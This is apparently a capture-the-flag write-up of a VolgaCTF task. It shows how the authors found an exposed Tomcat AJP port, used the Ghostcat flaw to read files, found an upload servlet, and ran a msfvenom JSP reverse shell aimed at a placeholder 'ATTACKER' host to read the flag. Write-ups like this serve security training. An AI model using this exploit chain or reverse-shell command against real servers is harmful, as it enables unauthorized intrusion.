Description:
Another telecom provider. Hope these guys prepared well enough for the network load…
Authors: g0dfuzzer, ne_bknn
No, you did not need to DoS this one.
The service has very limited functionality; there’s nothing to pwn on the front page. So I ran the usual checks: launched dirb with bo0om’s fuzz.txt and scanned the server’s ports.
Dirb revealed the /examples and /docs directories. Nmap showed that port 8009 was open, but somehow I didn’t check it; I assumed it belonged to yet another task hosted on the same machine.
So, this is Apache Tomcat. I spent way too much time exploring /examples when I should have been looking at /docs. /docs shows us Tomcat’s version, and this is crucial. Being desperate, I googled “apache tomcat CVE” and found that this very version is vulnerable to the Ghostcat attack. To exploit it we need Tomcat’s port 8009 (the AJP connector) open. The very port that I didn’t check several hours ago.
Found a Chinese PoC, got LFI on the server. WEB-INF/web.xml disclosed a previously unknown servlet, namely ServeScreenshotServlet.class. Downloaded it, decompiled it, and found file upload functionality.
An example of the file upload:
curl -F filename=@file -F submit=true http://netcorp.q.2020.volgactf.ru:7782/ServeScreenshot
The servlet puts files inside the /uploads directory, with a name that is a hash of the real filename.
Ghostcat can also evaluate Java (JSP) payloads, so let’s make use of it.
msfvenom -p java/jsp_shell_reverse_tcp lhost=ATTACKER lport=1337 > shell.jar
Upload the file using the aforementioned command, then use Ghostcat to run the reverse shell. Session popped! cat flag.txt
